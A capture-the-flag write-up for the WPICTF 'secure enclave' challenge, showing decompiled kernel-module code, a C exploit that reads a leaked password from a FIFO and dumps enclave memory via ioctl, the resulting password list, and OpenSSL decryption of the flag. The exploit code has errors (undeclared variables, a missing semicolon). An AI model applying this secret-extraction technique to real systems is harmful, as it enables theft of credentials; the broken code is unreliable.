secure_enclave.md

Secure enclave challenge @WPICTF

Looking at the decompiled secure_enclave.ko, we find

// read back to struct
iVar1 = enclave_read(auStack552,param_3,param_3,0);

...


ulong check_pass(void *param_1)
​
{
  int iVar1;
  
  iVar1 = memcmp(pass,param_1,0x20);
  return (ulong)(iVar1 == 0);
}


undefined8 enclave_read(undefined4 *param_1,undefined8 param_2)
​
{
  int iVar1;
  long lVar2;
  undefined4 *puVar3;
  undefined4 *puVar4;
  byte bVar5;
  
  bVar5 = 0;
  lVar2 = _copy_from_user(param_1,param_2,0x220);
  if ((lVar2 == 0) && (iVar1 = check_pass(param_1 + 0x80), iVar1 != 0)) {
    lVar2 = 0x80;
    puVar3 = (undefined4 *)data;
    puVar4 = param_1;
    while (lVar2 != 0) {
      lVar2 = lVar2 + -1;
      *puVar4 = *puVar3;
      puVar3 = puVar3 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
      puVar4 = puVar4 + (ulong)bVar5 * 0x3ffffffffffffffe + 1;
    }
    lVar2 = _copy_to_user(param_2,param_1,0x220);
    if (lVar2 == 0) {
      return 0;
    }
  }
  return 0xfffffff3;

Looking around in the file system, we find a FIFO queue called keydist, which emitts a 32-char string repeatedly (which I guess is the flaw here, it should only be passed once to the keydist process).

localhost:/tmp$ cat keydist.fifo  | hexdump 
0000000 d9da 5f59 754d bddd a319 9860 ede0 f500
0000010 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303
0000020 d9da 5f59 754d bddd a319 9860 ede0 f500
0000030 2562 9ad0 1a71 f3b8 1255 9d6d 9cc7 5303

Here is the include file associated with secure_enclave:

#ifndef _SECURE_ENCLAVE_H
#define _SECURE_ENCLAVE_H

#include <sys/ioctl.h>

#define ENCLAVE_SIZE 512
#define PASS_SIZE 32

typedef struct
{
    char data[ENCLAVE_SIZE];
    char pass[PASS_SIZE];
} secure_enclave_ctx;

#define SECURE_ENCLAVE_READ _IOR('s', 1, secure_enclave_ctx*)
#define SECURE_ENCLAVE_WRITE _IOW('s', 2, secure_enclave_ctx*)
#define SECURE_ENCLAVE_CLEAR _IOR('s', 3, secure_enclave_ctx*)

#endif

Exploit code

#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/secure_enclave.h>

#define ENCLAVE_READ 0x80087301
​
void dump(char *buf, size_t len){
​
    for(int i = 0; i < len; i++){
        printf("%02x ", buf[i] & 0xff);
        if ((i+1) % 0x20 == 0)
            printf("\n");
    }
​
    printf("\n");
}
​
int main(){
​
    secure_enclave_ctx c;
    char pass[sizeof c.pass];
    char data[sizeof c.data];

    fd = open("/tmp/keydist.fifo", O_RDONLY);
    read(fd, &pass, 32);
    close(fd);
​
    memset(&c, 0, sizeof c);
    memcpy (&(c.pass), &pass, sizeof pass);
    memcpy (&(c.data), &data, sizeof data);

    if ((fd = open("/dev/secure_enclave", O_RDWR)) < 0) {
        perror("open");
        return -1;
    }   

    ioctl(fd, ENCLAVE_READ, &c)
​
    printf("key: \n");
    dump(c.pass, sizeof c.pass);
​
    printf("retval: 0x%08x\n\n", r);
​
    printf("data: \n");
    dump(c.data, sizeof c.data);
​
    return 0;
}

Running the exploit:

localhost:~$ ./a.out 
key: 
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53 

data: 
50 72 69 76 61 74 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 64 6f 6e 27 74 20 72 65 61 64 2e 
0a 4b 65 79 20 6c 69 73 74 0a 32 34 33 38 32 39 34 37 33 32 39 34 32 39 38 34 33 32 39 5f 61 6a 
73 64 68 66 6f 69 77 65 68 6f 69 62 65 6f 67 65 6e 76 78 7a 75 65 77 69 72 6f 77 71 72 68 77 65 
72 68 20 2d 20 75 6e 75 73 65 64 0a 69 27 6d 61 62 65 74 74 65 72 68 61 63 6b 65 72 74 68 61 6e 
72 65 6d 79 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64 0a 70 6c 65 61 73 65 6d 61 6b 65 63 68 
61 6c 6c 65 6e 67 65 73 66 6f 72 77 70 69 63 74 66 20 2d 20 63 74 66 20 70 61 73 73 77 6f 72 64 
20 32 0a 64 74 65 72 6d 69 73 63 61 6e 63 65 6c 6c 65 64 20 2d 20 6a 75 73 74 69 6e 27 73 20 70 
61 73 73 77 6f 72 64 0a 6c 69 6e 75 78 69 73 74 68 65 62 65 73 74 6f 73 5f 61 6c 6c 74 68 65 77 
69 6e 64 6f 77 73 6c 6f 76 65 72 73 61 72 65 6a 75 73 74 62 61 64 61 74 70 72 6f 67 72 61 6d 6d 
69 6e 67 20 2d 20 73 75 70 65 72 20 73 65 63 72 65 74 20 66 69 6c 65 20 70 61 73 73 77 6f 72 64 
0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
da d9 59 5f 4d 75 dd bd 19 a3 60 98 e0 ed 00 f5 62 25 d0 9a 71 1a b8 f3 55 12 6d 9d c7 9c 03 53 
6b 65 79 64 69 73 74 0a 09 20 2d 72 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20 72 
65 61 64 20 6d 6f 64 65 0a 09 20 2d 77 20 20 20 20 20 20 20 20 20 20 53 74 61 72 74 20 69 6e 20 
77 72 69 74 65 20 6d 6f 64 65 0a 00 00 00 00 00 2f 74 6d 70 2f 6b 65 79 64 69 73 74 2e 66 69 66 
6f 00 00 00 01 1b 03 3b 40 00 00 00 07 00 00 00 4c ed ff ff 5c 00 00 00 5c ee ff ff 84 00 00 00 


Private data, please don't read.
Key list
2438294732942984329_ajsdhfoiwehoibeogenvxzuewirowqrhwerh - unused
i'mabetterhackerthanremy - ctf password
pleasemakechallengesforwpictf - ctf password 2
dtermiscancelled - justin's password
linuxisthebestos_allthewindowsloversarejustbadatprogramming - super secret file password

What is the encryption used?

localhost:~$ cat flag.enc|hd
00000000  53 61 6c 74 65 64 5f 5f  8b d2 02 ff 25 ca d8 9a  |Salted__....%...|
00000010  c7 f4 bb 0d 8f 78 b4 b5  70 c7 ea 13 c9 fb 54 e4  |.....x..p.....T.|
00000020  fe e3 ea 9c 55 1b 66 00  93 f6 a4 99 2c 17 7a 6a  |....U.f.....,.zj|
00000030  0f b9 d8 f9 1a a0 08 6f  f7 cd 29 54 cc 98 db 29  |.......o..)T...)|
00000040  53 f9 c9 fa 7c ce 5f e5  4e f7 9a 87 cd 38 fa c6  |S...|._.N....8..|
00000050

Using the password linuxisthebestos_allthewindowsloversarejustbadatprogramming to decrypt the file using OpenSSL:

localhost:~$ openssl aes-256-cbc -d -in flag.enc -out blah.txt
enter aes-256-cbc decryption password:
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
localhost:~$ cat blah.txt 
Well that was fun.
WPI{@curl3$$_1$_@n_3pic_H@XOR}